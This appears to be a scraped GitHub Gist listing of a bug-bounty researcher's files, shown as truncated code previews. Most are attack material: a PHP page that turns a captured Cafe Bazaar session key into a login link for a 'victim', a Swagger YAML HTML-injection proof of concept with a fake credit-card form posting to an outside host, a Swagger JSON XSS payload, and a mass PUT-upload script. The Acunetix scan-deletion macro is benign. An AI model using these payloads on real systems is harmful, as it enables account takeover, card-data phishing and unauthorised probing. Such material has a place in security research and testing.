xElkomy
/ acunetix_deletescans.js
Created
December 16, 2023 17:12
Basic Javascript macro open https://example/#/scans?status=queued,starting and put this code into your console and click enter and let it, it will loop 100 with delay before every loop 10 seconds.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Function to click the "Select All" checkbox | |
| function clickSelectAll() { | |
| const selectAllCheckbox = document.querySelector('.mat-checkbox-inner-container.mat-checkbox-inner-container-no-side-margin'); // Adjust the selector based on the actual class or selector for the "Select All" checkbox | |
| selectAllCheckbox.click(); | |
| } | |
| // Function to click the "Delete Scans" button | |
| function clickDeleteButton() { | |
| const buttons = document.querySelectorAll('.mat-button-wrapper'); // Adjust the selector based on the actual class or selector for buttons in Acunetix |
xElkomy
/ Bazar-Exploit.php
Created
July 5, 2022 16:01
— forked from Voorivex/Bazar-Exploit.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (isset($_GET['key'])) { | |
| //Get authentication token | |
| $token = $_GET['key']; | |
| $login_link = "https://cafebazaar.ir/login/bysession?key=" . $token . "&next=/account/"; | |
| $login_link = "Login link: <a href='" . $login_link . "' target='_blank'>" . $login_link . "</a>"; | |
| if ($token == "") { | |
| $login_link = "Login Link: Failure! Victim not logged in."; | |
| } | |
xElkomy
/ swagger-injection.yaml
Last active
November 23, 2022 13:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: 1.0.0 | |
| title: HTML INJECTION POC | |
| description: '<div class="creditCardForm"> | |
| <div class="heading"> | |
| <h1>Update your Credit Card</h1> | |
| </div> | |
| <div class="payment"> | |
| <form action="https://q0x.xyz" method="post" class="form-signin" id = "login_form"> |
xElkomy
/ SwaggerXSS.json
Last active
August 9, 2021 22:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "components": { | |
| "parameters": { | |
| "alert": { | |
| "description": "[xElkomyistoooooooooooooooooooooooooooooooooooooooooooooooooooo](javascript:alert('XSS'))", | |
| "explode": false, | |
| "in": "path", | |
| "name": "<script>console.log(‘000000000000000000dad0000000000000000000');</script>", | |
| "required": true, | |
| "schema": { |
xElkomy
/ check-put.sh
Last active
December 23, 2020 22:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # the script will test for PUT upload method against all the hosts | |
| # Thanks shibli2700 https://github.com/shibli2700/Rekon/blob/master/puttest.sh | |
| for domain in $(cat $1) | |
| do | |
| curl -s -o /dev/null -X PUT -d "hello world" "${domain}/evil.txt" | |
| done | |
| #My Script for check https://github.com/xElkomy/Workflow-Bug-Bounty/blob/master/Fuzz-xElkomy.py | |
| python3 Fuzz-xElkomy.py hosts.txt '/evil.txt' 'hello world' > results-putcheck.txt |